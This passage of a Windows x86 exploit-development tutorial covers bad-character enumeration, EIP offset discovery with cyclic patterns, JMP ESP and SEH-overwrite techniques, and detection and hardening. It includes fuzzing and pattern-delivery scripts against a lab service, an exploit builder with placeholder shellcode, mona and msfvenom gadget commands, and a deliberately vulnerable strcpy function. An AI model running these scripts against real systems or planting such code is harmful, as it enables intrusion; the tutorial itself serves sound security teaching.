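        and "UNKNOWN" in event.get("CallTrace", "")
    )


# Hypothetical parsed events
events = [
    {"EventID": 10, "SourceImage": r"C:\lab\vulnserver.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1F3FFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(00000000001A0F3C)"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4"},
]

for e in filter(is_suspicious, events):
    print("ALERT:", e["SourceImage"], "->", e["TargetImage"])
```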

13. Tools for Bad-Character Analysis
| Tool | Description | Link |
|---|---|---|
| Immunity Debugger | Crash analysis, ESP dump inspection | immunityinc.com |
| mona.py | Bytearray generation and memory comparison | github.com/corelan |
| WinDbg | Opcode/gadget inspection, memory diffing | microsoft.com |
| msfvenom | Shellcode generation and encoding (-b) | offsec.com |
| Alpha2 | Standalone alphanumeric shellcode encoder | github.com |
| x64dbg | User-mode debugging and patching | x64dbg.com |
| Ghidra | Static opcode/disassembly analysis | ghidra-sre.org |
| Volatility | Memory forensics, unbacked code regions | volatilityfoundation.org |
14. MITRE ATT&CK Mapping
Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Process crash bursts, EID 1 framework launches |
| Exploit Public-Facing Application | T1190 | WAF anomalies, service access violations |
| Exploitation for Privilege Escalation | T1068 | Local overflow → elevated process behavior |
| Obfuscated Files or Information | T1027 | Encoder signatures (shikata/alpha) on disk/wire |
| Process Injection | T1055 | Sysmon EID 8/10, UNKNOWN in CallTrace |
Summary
- Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it executes; you must enumerate them empirically, never assume.
- \x00 is always bad in string-based overflows because CRT functions like strcpy and strlen treat it as the terminator; sockets pass it but downstream string APIs still die on it.
- Enumerate with a \x01–\xFF byte array, diff memory using !mona compare, and remember only the first byte of a corrupted run is confirmed bad.
- Adapt with msfvenom -b encoding (shikata_ga_nai, falling back to call4_dword_xor or alpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers.
- Detect the resulting payloads via Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and process-creation auditing (4688).
Finding the EIP Offset: Pattern Creation and Cyclic Patterns
Objective: Understand how to determine the exact EIP overwrite offset in a classic x86 stack-based buffer overflow by sending a cyclic (De Bruijn-derived) pattern, reading the value loaded into EIP at crash time, and calculating the precise byte distance from the buffer’s start to the saved return address — a repeatable, tool-agnostic workflow for authorized lab use.
1. Prerequisites and Lab Setup
This workflow assumes an isolated, authorized lab VM — never a production host. The classic offset-finding exercise targets a purpose-built vulnerable service such as vulnserver.exe or brainpan.exe, attached to a debugger.
You will need:
| Component | Role |
|---|---|
| Immunity Debugger | Attach to the target process and read register state at crash time. |
| mona.py | Pattern generation and offset search inside Immunity. |
| Kali + Metasploit | msf-pattern_create / msf-pattern_offset wrappers. |
| Python 3 (+ pwntools) | Scripted fuzzing, pattern delivery, and cyclic() math. |
Attach Immunity to the running service (File → Attach), press F9 to resume, then drive input from your Python script across the network. Configure mona's working folder first:
!mona config -set workingfolder c:\mona\%p
2. The x86 Stack Frame: Why EIP Is the Target
EIP (Extended Instruction Pointer) is the 32-bit register holding the address of the next instruction. On function return, the ret instruction pops the saved return address off the stack into EIP. If you can overwrite that saved value, you control where execution flows next.
On a standard MSVC/GCC x86 cdecl frame, the layout is:
[ local buffer (N bytes) ] <- lower address, ESP near here on entry
[ saved EBP (4 bytes) ]
[ saved EIP (4 bytes) ] <- overwrite target
[ function arguments ] <- higher address
The saved EIP sits above the saved EBP in the stack image. The offset is the byte distance from byte 0 of your input buffer to the first byte of saved EIP. ESP matters too: after ret, ESP advances past the popped return address and typically points directly into your attacker-controlled buffer region, which is the basis for later JMP ESP stages.

3. From Fuzzing to Approximate Crash Size
The prior stage — fuzzing — delivers progressively larger buffers of A bytes (\x41) until the service dies. When the debugger shows EIP = 41414141, the saved return address has been fully overwritten with As. That confirms EIP control but tells you nothing about where in the buffer EIP lands.
import socket, time
ip, port = "192.168.56.10", 9999
size = 100
while True:
    try:
        with socket.create_connection((ip, port), timeout=5) as s:
            buf = b"A" * size
            s.send(b"TRUN /.:/" + buf) # protocol-specific prefix
        print(f"[*] Sent {size} bytes")
        size += 100
        time.sleep(1)
    except Exception:
        print(f"[!] Crash near {size} bytes")
        break
Round the crash size up to a clean number, say 2000 bytes. That value becomes the pattern length.
4. The Mathematics of Cyclic Patterns
EIP = 41414141 is ambiguous because every byte is identical. The fix is a cyclic pattern: a string in which every fixed-length substring appears exactly once. Find which substring landed in EIP, and you have the offset.
| Concept | Detail |
|---|---|
| De Bruijn sequence | A sequence where every possible subsequence of a fixed length appears exactly once. This uniqueness is what makes offset lookup deterministic. |
| Why it works | The overwriting bytes are popped into EIP on ret. Because each 4-byte window is unique, the EIP value maps to exactly one position in the input. |
| Metasploit variant | Metasploit patterns use a different algorithm than true De Bruijn but serve the same purpose, drawing from uppercase letters, lowercase letters, and digits. |
| 3-char uniqueness | pattern_create produces a string where every three-character substring is unique: Aa0Aa1Aa2Aa3Aa4.... |
pwntools cyclic() generates a true De Bruijn sequence; msf-pattern_create uses the alphabet-based approach. Both yield a unique mapping you can query.
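To make the alphabet-based approach concrete, here is a dependency-free sketch of an upper/lower/digit pattern and the matching offset lookup. It is an illustration of the idea, not Metasploit's source: the function names are borrowed for readability, and unlike the real tool it refuses lengths beyond one full cycle (20,280 bytes) instead of repeating.

```python
import string
from itertools import product

MAX_LEN = 26 * 26 * 10 * 3  # one full cycle of Upper/lower/digit triplets


def pattern_create(length: int) -> bytes:
    """Build an Aa0Aa1Aa2... pattern of the requested length."""
    if not 0 <= length <= MAX_LEN:
        raise ValueError(f"length must be between 0 and {MAX_LEN}")
    triplets = []
    for upper, lower, digit in product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        if len(triplets) * 3 >= length:
            break
        triplets.append(upper + lower + digit)
    return "".join(triplets)[:length].encode("ascii")


def pattern_offset(register_hex: str, length: int) -> int:
    """Map a register value (as the debugger displays it) to a pattern offset."""
    needle = bytes.fromhex(register_hex)[::-1]  # undo little-endian display order
    return pattern_create(length).find(needle)  # -1 when not found


print(pattern_create(15))
print(pattern_offset("6F43396E", 2000))
```

Because each 4-byte window occurs once within a cycle, `find` returns a single unambiguous position; a result of -1 means the value did not come from this pattern or the pattern was too short.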

5. Generating the Pattern: Three Tool Paths
Generate a pattern equal to (or slightly larger than) the crash size. The -l flag is length; the -q flag (next section) is the query value.
Metasploit (Bash):
# Generate a 2000-byte non-repeating pattern
msf-pattern_create -l 2000
# Or the script directly:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
mona.py (Immunity command bar):
!mona pc 2000
pwntools (Python 3):
from pwn import *
pattern = cyclic(2000)
print(pattern)
Tip: Generate a pattern 400 bytes larger than the crash buffer to also reveal whether shellcode space exists immediately after the EIP overwrite.
6. Sending the Pattern and Capturing the EIP Value
Replace the A buffer in your fuzzing script with the generated pattern, reattach Immunity, and reproduce the crash.
import socket
pattern = b"Aa0Aa1Aa2Aa3Aa4..." # paste msf-pattern_create -l 2000 output
ip, port = "192.168.56.10", 9999
with socket.create_connection((ip, port)) as s:
    s.send(b"TRUN /.:/" + pattern)
When the process faults, read the 4-byte EIP value from Immunity's register panel, for example 6F43396E.
Little-endian note: Values are written to the stack least-significant-byte first. A debugger may display the register as 6F43396E. Tools like pattern_offset handle endianness internally, so pass the displayed value as-is. A manual ASCII lookup, however, requires reversal: 6F43396E → 6E39436F → n9Co.
7. Calculating the Exact Offset
Feed the EIP value into any of the three tools. All return the same byte distance.
Metasploit (Bash):
# -q is the query switch; pass the EIP value from the debugger
msf-pattern_offset -l 2000 -q 6F43396E
# Output:
# [*] Exact match at offset 1978
mona.py (Immunity): findmsp searches every register and the stack against the pattern.
!mona findmsp -distance 2000
Read the log line:
EIP contains normal pattern : ... (offset 1978)
(!mona po 6F43396E performs the same lookup by hex value.)
pwntools (Python 3): cyclic_find accepts the packed 4-byte value.
from pwn import *
offset = cyclic_find(p32(0x6161616c)) # value read from EIP
print(offset) # -> integer byte offset
gdb-peda's pattern_search reports the EBP, EIP, and ESP offsets at once on Linux targets (e.g. EIP+0 found at offset: 1040 and [ESP] --> offset 1044), which is useful for spotting where ESP lands relative to EIP.
8. Verifying EIP Control
Never trust a calculated offset blindly. Confirm it by overwriting EIP with a known marker. Set payload to empty and retn to "BBBB":
import socket
prefix = b"TRUN /.:/"
offset = 1978
overflow = b"A" * offset
retn = b"BBBB" # 0x42424242
payload = b"" # no payload yet — verification only
buf = prefix + overflow + retn + payload
with socket.create_connection(("192.168.56.10", 9999)) as s:
    s.send(buf)
Reload the app in Immunity and re-send. If the offset is correct, EIP shows 42424242, the hex of “BBBB”. You now control execution flow exactly. Confirm ESP also points into your buffer; that location holds the bytes that follow retn and becomes your future code-redirect landing zone.
The conceptual stack image after the overwrite:
[ AAAA AAAA ... AAAA ] offset bytes filling buffer + saved EBP
[ BBBB ] saved EIP = 0x42424242 (controlled)
[ CCCC ... ] ESP region (future shellcode space)
9. Common Pitfalls and Edge Cases
- Pattern shorter than the real offset: EIP holds bytes from beyond your pattern; the offset tool returns no match. Regenerate longer.
- Bad characters: Bytes like \x00, \x0a, \x0d can truncate or corrupt the pattern mid-stream, shifting EIP unpredictably. Bad-char analysis is a separate stage.
- Modern mitigations: ASLR and DEP/NX invalidate the naive EIP→ESP→shellcode chain on hardened targets. The offset still exists, but exploitation requires bypasses (covered in later tutorials).
- SEH-based overflows: When the buffer overruns the Structured Exception Handler instead of the saved return address, EIP may not show pattern bytes directly; !mona findmsp will instead report the offset to the SEH/nSEH records.
10. Common Attacker Techniques
Offset discovery is a development sub-step that feeds the techniques below.
| Technique | Description |
|---|---|
| Stack buffer overflow | Overrun a fixed local buffer to overwrite the saved return address. |
| Cyclic pattern offset finding | Deterministically locate the EIP overwrite distance, as taught here. |
| EIP redirection via JMP ESP | Once the offset is known, replace retn with the address of a JMP/CALL ESP gadget. |
| SEH overwrite | Variant overflow that hijacks the exception handler chain instead of ret. |
11. Defensive Strategies and Detection
Detection splits into two contexts: catching exploitation attempts against a service, and catching the crash-loop behaviour of fuzzing/pattern delivery.
Crash and process telemetry:
- Application Error, Event ID 1000 (Application log): logged on 0xC0000005 (Access Violation) when EIP corruption kills the process; the faulting address is the pattern value (e.g. 0x41307241).
- Windows Error Reporting, Event ID 1001: WER bucket data, faulting instruction pointer, and dump path for post-crash forensics.
- Sysmon Event ID 3 (Network Connection): repeated high-rate TCP connections to a single service port during fuzzing and pattern delivery are anomalous; watch DestinationPort and SourceIp.
- Sysmon Event ID 1 (Process Create): child processes spawned if the overflow reaches code execution; inspect CommandLine, ParentImage, IntegrityLevel.
ETW providers: Microsoft-Windows-WER-SystemErrorReporting emits access-violation crash events; Microsoft-Windows-Kernel-Process reveals abnormal crash-and-restart loops via process start/stop events. Forward both to a SIEM.
A repeated-crash detection sketch (illustrative):
title: Repeated Application Crash Loop (Possible Buffer Overflow Fuzzing)
logsource:
    product: windows
    service: application
detection:
    selection:
        EventID: 1000
        ExceptionCode: '0xc0000005' # Access Violation
    timeframe: 1m
    condition: selection | count() > 5 # repeated crashes = fuzzing indicator
level: high
Hardening checklist (raises the bar from “find the bug” to “bypass every mitigation”):
- Compile with /GS stack security cookies; a mismatch is caught by __security_check_cookie(), which terminates the process before ret.
- Enable DEP/NX system-wide: bcdedit /set nx AlwaysOn.
- Enable ASLR: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages = 1.
- Compile with Control Flow Guard: /guard:cf.
- Link with SafeSEH (/SAFESEH) to block SEH overwrites on x86.
- Replace unbounded strcpy, gets, scanf("%s", ...) with strcpy_s, strncpy_s, gets_s.
- Run Application Verifier with heap and stack checks during development.
These map to MITRE mitigation M1050 — Exploit Protection.
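The crash-loop threshold from the detection sketch earlier in this section (more than five access-violation crashes inside one minute) can be prototyped as a sliding window before committing it to a SIEM rule. The tuple layout `(timestamp_seconds, event_id, exception_code)` and the sample data are assumptions made for illustration.

```python
from collections import deque


def crash_bursts(events, window=60.0, threshold=5):
    """Yield timestamps at which more than `threshold` AV crashes fall in `window` seconds."""
    recent = deque()
    for ts, event_id, code in sorted(events):
        if event_id != 1000 or code.lower() != "0xc0000005":
            continue
        recent.append(ts)
        # Drop crashes that have aged out of the window
        while ts - recent[0] > window:
            recent.popleft()
        if len(recent) > threshold:
            yield ts


# Hypothetical Application-log extract: six crashes in 50 s, then a lone one later
sample = [(float(t), 1000, "0xC0000005") for t in (0, 10, 20, 30, 40, 50)]
sample.append((500.0, 1000, "0xC0000005"))
sample.append((25.0, 1001, ""))  # unrelated WER event, ignored

print(list(crash_bursts(sample)))
```

Tuning `window` and `threshold` against a baseline of normal service restarts keeps the rule from firing on a single unlucky crash.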
12. Tools for Offset Analysis
| Tool | Description | Link |
|---|---|---|
| msf-pattern_create / pattern_create.rb | Generate a non-repeating pattern of length -l. | metasploit.com |
| msf-pattern_offset / pattern_offset.rb | Query offset with -q <EIP_HEX>. | metasploit.com |
| mona.py | !mona pc, !mona findmsp, !mona po inside Immunity. | github.com |
| Immunity Debugger | Attach, reproduce crash, read EIP/ESP. | immunityinc.com |
| pwntools | cyclic() / cyclic_find() De Bruijn math. | github.com |
| GDB + PEDA | pattern_search reports EBP/EIP/ESP offsets. | github.com |
13. MITRE ATT&CK Mapping
Offset finding is a pre-exploitation development sub-step with no dedicated technique ID; it supports the techniques below.
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Crash telemetry (Event ID 1000), anomalous child processes (Sysmon ID 1). |
| Exploitation for Privilege Escalation | T1068 | Access-violation crashes in privileged services; WER buckets. |
| Exploit Public-Facing Application | T1190 | High-rate TCP to a service port (Sysmon ID 3); crash loops. |
| Exploitation for Defense Evasion | T1211 | Memory-corruption indicators; EDR memory hooks. |
| Exploit Protection (Mitigation) | M1050 | DEP, ASLR, CFG, /GS, SafeSEH. |
Summary
- The EIP offset is the exact byte distance from your buffer's start to the saved return address, and a cyclic pattern finds it deterministically.
- A De Bruijn / Metasploit pattern makes every fixed-length window unique, so the value popped into EIP maps to a single position.
- Generate with msf-pattern_create, !mona pc, or cyclic(); resolve with msf-pattern_offset -q, !mona findmsp, or cyclic_find().
- Verify by overwriting EIP with "BBBB" and confirming EIP = 42424242; remember little-endian display order.
- Defenders catch the activity via Event ID 1000 (0xC0000005) crash loops and Sysmon Event ID 3 connection floods; M1050 controls (DEP, ASLR, CFG, /GS) raise the exploitation bar dramatically.
Classic Stack Buffer Overflow: Smashing the Stack on Windows
Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved EIP, and redirects execution through a JMP ESP trampoline, and how /GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.
1. Windows Memory Layout Primer
Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x00000000–0x7FFFFFFF for user mode. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.
The CPU tracks two stack-relevant registers and one execution register:
- ESP: stack pointer, the current top of stack.
- EBP: base/frame pointer, anchors the current frame.
- EIP: instruction pointer, the address of the next instruction. This is the attacker's target.
A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.
x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.
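The byte ordering is easy to confirm with Python's standard struct module, which is also what helpers such as pwntools' p32 wrap. The address is the same illustrative value used in the paragraph above.

```python
import struct

addr = 0x625011AF

packed = struct.pack("<I", addr)            # "<I" = little-endian unsigned 32-bit
print(packed.hex(" "))                      # af 11 50 62

(roundtrip,) = struct.unpack("<I", packed)  # back to the integer a debugger shows
print(hex(roundtrip))                       # 0x625011af
```

The same conversion explains why a register displayed as 6F43396E corresponds to the in-memory byte string `n9Co`.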
2. Anatomy of a Stack Frame
A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:
| Stack Slot | Description |
|---|---|
| Function arguments | Pushed by caller before CALL |
| Saved EIP (return address) | Pushed implicitly by the CALL instruction |
| Saved EBP | Pushed by callee prologue (PUSH EBP) |
| /GS stack cookie (if present) | Inserted between locals and saved EBP/EIP |
| Local variables / buffers | Allocated by SUB ESP, N |
| ← ESP (stack top) | Grows downward |
The prologue and epilogue, with the /GS cookie check shown, look like this:
; --- Prologue ---
push ebp ; save caller frame pointer
mov ebp, esp ; establish new frame
sub esp, 0x40 ; allocate 64 bytes of locals
mov eax, [__security_cookie]
xor eax, ebp ; cookie ^= EBP (frame-tied canary)
mov [ebp-4], eax ; store cookie above locals
; --- Epilogue ---
mov ecx, [ebp-4]
xor ecx, ebp
call __security_check_cookie ; compare vs master; abort on mismatch
mov esp, ebp
pop ebp ; restore caller frame pointer
ret ; pop saved EIP into instruction pointer
Reading this frame live in WinDbg or x64dbg (inspecting ESP, EBP, and the bytes between locals and the saved return address) is the first skill of exploit development.

3. The Overflow: Why Bounds Checks Matter
The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.
| Identifier | What it does |
|---|---|
| strcpy, strcat, gets, sprintf, scanf | Unsafe CRT functions with no bounds checking; classic root causes |
| memcpy(dst, src, count) | Copies count bytes regardless of dst size; dangerous when count is attacker-controlled |
Here is the canonical vulnerable pattern defenders must recognize in code review:
#include <string.h>
// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
    char buffer[64]; // fixed 64-byte stack buffer
    strcpy(buffer, attacker_input); // no length check: overflow
}
When attacker_input exceeds 64 bytes, the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.
When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.
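The order in which the frame is clobbered can be modelled without touching a real process. The toy below treats a /GS- frame as a flat bytearray (64-byte buffer, then saved EBP, then saved EIP) and performs an unbounded copy into it. The saved values are invented, compiler padding is ignored, and strcpy's trailing null is not modelled, so treat it as a picture of the layout rather than of any particular binary.

```python
import struct

BUF_SIZE = 64
SAVED_EBP = 0x0019FF70  # hypothetical caller frame pointer
SAVED_EIP = 0x00401234  # hypothetical legitimate return address


def unbounded_copy(data: bytes) -> dict:
    """Copy data into a modelled frame with no length check; report the saved values."""
    frame = bytearray(BUF_SIZE + 8)  # buffer | saved EBP | saved EIP (low -> high)
    struct.pack_into("<II", frame, BUF_SIZE, SAVED_EBP, SAVED_EIP)
    n = min(len(data), len(frame))   # clip to the part of the stack we model
    frame[:n] = data[:n]
    ebp, eip = struct.unpack_from("<II", frame, BUF_SIZE)
    return {"saved_ebp": ebp, "saved_eip": eip}


for size in (64, 68, 72):
    state = unbounded_copy(b"A" * size)
    print(size, hex(state["saved_ebp"]), hex(state["saved_eip"]))
```

At 64 bytes both saved values survive, at 68 the saved EBP is gone, and at 72 the return address reads 0x41414141.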
4. Exploit Development Methodology on Windows
The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:
- Fuzz to crash: send increasing-length inputs until the service faults.
- Find the offset: send a cyclic (de Bruijn) pattern, read the value in EIP at crash, compute the exact distance to the return address.
- Confirm EIP control: overwrite with a known marker (0x42424242) and verify.
- Enumerate bad characters: find bytes the protocol mangles (\x00, \x0a, \x0d are common).
- Find a trampoline: locate JMP ESP in a non-ASLR module.
- Build the payload: padding + trampoline address + NOP sled + shellcode.
A minimal network fuzzer:
import socket, time
target = ("192.168.56.20", 9999)
size = 100
while size < 4000:
    try:
        s = socket.socket()
        s.connect(target)
        buf = b"TRUN /.:/" + b"A" * size # protocol prefix + payload
        s.send(buf)
        s.close()
        print(f"[+] sent {size} bytes")
        size += 200
        time.sleep(1)
    except Exception:
        print(f"[!] crashed at ~{size} bytes")
        break
Offset discovery with a cyclic pattern (generated by pwntools or !mona pattern_create):
from pwn import cyclic, cyclic_find
pattern = cyclic(3000) # de Bruijn sequence
# ... send pattern, read EIP from the debugger at crash (e.g. 0x6161616c) ...
# The value must come from this pwntools pattern; a Metasploit-pattern value such as 0x6f43396e is not in it.
offset = cyclic_find(0x6161616c) # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")
Bad-character enumeration sends the full byte range and diffs it against memory:
badchar_test = bytes(b for b in range(1, 256)) # skip \x00 first
# Send, then in the debugger: d esp -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.
The final builder assembles the pieces. Note the placeholder shellcode: generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:
from pwn import p32
offset = 2003
jmp_esp = 0x625011AF # FF E4 in a non-ASLR module
nop_sled = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]" # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32 # placeholder
payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcode
The key opcodes you search modules for:
| Opcode bytes | Instruction | Use |
|---|---|---|
| FF E4 | JMP ESP | Classic return trampoline |
| FF D4 | CALL ESP | Equivalent effect |
| FF E5 | JMP EBP | When EBP points near the buffer |
| EB 06 | Short JMP +6 | Next-SEH jump-over gadget |
Because ESP points at the attacker’s buffer when RET executes, returning into JMP ESP immediately pivots execution into the NOP sled and shellcode.

5. Windows Mitigations Deep-Dive
Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.
| Mitigation | Mechanism | Bypass vector (teaching) |
|---|---|---|
| /GS (stack cookie) | Random DWORD cookie between locals and saved EBP/EIP; checked in epilogue | SEH overwrite before the cookie check; cookie leak |
| SafeSEH | PE table of valid SEH handlers; loader validates the handler before dispatch | Trampoline in a module not compiled /SAFESEH |
| SEHOP | Validates the SEH chain reaches FinalExceptionHandler at dispatch | Chain spoofing; non-opted-in modules |
| DEP/NX (/NXCOMPAT) | Pages are W^X; the stack is non-executable | ROP chain (follow-on topic) |
| ASLR (/DYNAMICBASE) | Randomizes image/stack/heap base | Partial overwrites, info leaks (follow-on topic) |
/GS computes a program-wide master cookie at startup via __security_init_cookie(), stored in the module’s .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.
The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.
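The effect of the cookie on a linear overflow can be shown with a small model of the frame: buffer, cookie, saved EBP, saved EIP, with the cookie compared before the modelled return. This is a deliberate simplification. The real check XORs the cookie with EBP and calls `__report_gsfailure()`, and the cookie, EBP, and EIP values below are arbitrary placeholders.

```python
import struct

BUF_SIZE = 64


def run_frame(data: bytes, cookie: int) -> str:
    """Copy data into a modelled /GS frame, then run the epilogue check."""
    # Layout, low -> high: buffer | cookie | saved EBP | saved EIP
    frame = bytearray(BUF_SIZE + 12)
    struct.pack_into("<III", frame, BUF_SIZE, cookie, 0x0019FF70, 0x00401234)
    n = min(len(data), len(frame))
    frame[:n] = data[:n]             # unbounded copy, clipped to the model
    (stored,) = struct.unpack_from("<I", frame, BUF_SIZE)
    if stored != cookie:             # epilogue: compare against the master value
        return "abort: cookie mismatch"
    (eip,) = struct.unpack_from("<I", frame, BUF_SIZE + 8)
    return f"ret to {eip:#010x}"


cookie = 0x5C3A91E7  # placeholder; the real value is randomised at startup
print(run_frame(b"A" * 64, cookie))  # in-bounds write
print(run_frame(b"A" * 76, cookie))  # overflow reaches EIP but trips the cookie first
```

The model also shows the limitation noted above: anything the overflow corrupts that is consumed before the epilogue runs, such as an exception handler record, is never covered by this check.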

6. SEH-Based Overflow (x86)
On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:
typedef struct _EXCEPTION_REGISTRATION_RECORD {
struct _EXCEPTION_REGISTRATION_RECORD *Next; // next handler in chain
PEXCEPTION_ROUTINE Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;
When a function uses try/except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler, bypassing the cookie entirely.
The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. At dispatch, the stack arrangement places a pointer to the Next SEH field where RET lands; POP–POP–RET unwinds two slots and returns into the attacker’s Next SEH value, which is typically a short jump (EB 06) over the handler bytes into the shellcode.
SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (introduced in Vista SP1 and Windows Server 2008; enabled by default on server editions, off by default on Vista and Windows 7 clients) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.
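The chain walk that SEHOP performs can be sketched as follows. This is a simplified model under stated assumptions, not the kernel's actual code: memory is a dictionary mapping a record address to its (Next, Handler) pair, and `FINAL_HANDLER`, the stack bounds, and every address in the usage lines are hypothetical values chosen for illustration.

```python
FINAL_HANDLER = 0x77001000   # hypothetical address of the final handler in ntdll
END_OF_CHAIN = 0xFFFFFFFF    # Next value that terminates an x86 SEH chain

def chain_is_valid(records, head, stack_lo, stack_hi, max_depth=64):
    """Walk Next pointers; accept only a chain that ends at FINAL_HANDLER."""
    addr = head
    for _ in range(max_depth):
        # Every record must be DWORD-aligned and live inside the thread's stack.
        if addr % 4 or not (stack_lo <= addr < stack_hi) or addr not in records:
            return False
        next_record, handler = records[addr]
        if next_record == END_OF_CHAIN:
            return handler == FINAL_HANDLER
        addr = next_record
    return False  # too long or cyclic

intact = {0x0012FF00: (0x0012FF40, 0x00401000),
          0x0012FF40: (END_OF_CHAIN, FINAL_HANDLER)}
# Overwritten record: Next holds the bytes EB 06 90 90 read as a little-endian DWORD.
smashed = {0x0012FF00: (0x909006EB, 0x625010B4)}
print(chain_is_valid(intact, 0x0012FF00, 0x0012F000, 0x00130000))
print(chain_is_valid(smashed, 0x0012FF00, 0x0012F000, 0x00130000))
```

The overwritten chain fails because a short-jump opcode read as a pointer does not land on a valid record inside the stack, so the walk never reaches the final handler.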

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary
Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:
- No-protections build: Compile with /GS- /NXCOMPAT:NO /DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirm EIP control, enumerate bad chars, locate JMP ESP with mona.py, and land in a NOP sled.
- /GS-only build: Recompile with /GS enabled, replay the same payload, and watch __security_check_cookie detect the corrupted canary and terminate the process via __report_gsfailure(). The same input that worked now dies in the epilogue.
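The "find the offset with a cyclic pattern" step works because every 4-byte window of the pattern is unique, so the value that lands in EIP identifies its own position. A minimal sketch of that idea follows; the function names `cyclic` and `cyclic_find` are chosen here for illustration, and the pattern is the familiar upper/lower/digit triple sequence rather than the output of any specific tool.

```python
import string

MAX_LEN = 26 * 26 * 10 * 3  # 20280 bytes before the triple sequence is exhausted

def cyclic(length):
    """Return `length` bytes of the pattern Aa0Aa1Aa2... (unique 4-byte windows)."""
    if not 0 <= length <= MAX_LEN:
        raise ValueError("length out of range for this pattern")
    triples = (u + l + d
               for u in string.ascii_uppercase
               for l in string.ascii_lowercase
               for d in string.digits)
    out = []
    while len(out) * 3 < length:
        out.append(next(triples))
    return "".join(out)[:length].encode("ascii")

def cyclic_find(eip_value, length=MAX_LEN):
    """Offset of the 4 bytes that ended up in EIP, or -1 if not from the pattern."""
    needle = eip_value.to_bytes(4, "little")   # x86 stores DWORDs little-endian
    return cyclic(length).find(needle)

pattern = cyclic(3000)
crash_eip = int.from_bytes(pattern[2003:2007], "little")  # simulate the crash value
print(cyclic_find(crash_eip))
```

A result of -1 for a value such as 0x41414141 is a useful sanity check: it means the crash came from a plain filler buffer, not from the pattern.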
Reference debugger and mona.py commands:
0:000> g ; run until crash
0:000> r ; read registers — expect EIP = 41414141
0:000> d esp ; dump stack at ESP — find your buffer
0:000> !exploitable ; triage the crash classification
0:000> bp 0x625011AF ; break on the JMP ESP trampoline
!mona findmsp ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d" ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00" ; generate byte array for badchar diffing
8. Common Attacker Techniques
| Technique | Description |
|---|---|
| Linear stack smash | Overflow a buffer to overwrite saved EIP with a JMP ESP trampoline |
| SEH overwrite | Overwrite Next SEH + SE Handler, trigger an exception to bypass /GS |
| Non-SafeSEH trampoline | Source POP–POP–RET / JMP ESP gadgets from modules lacking /SAFESEH |
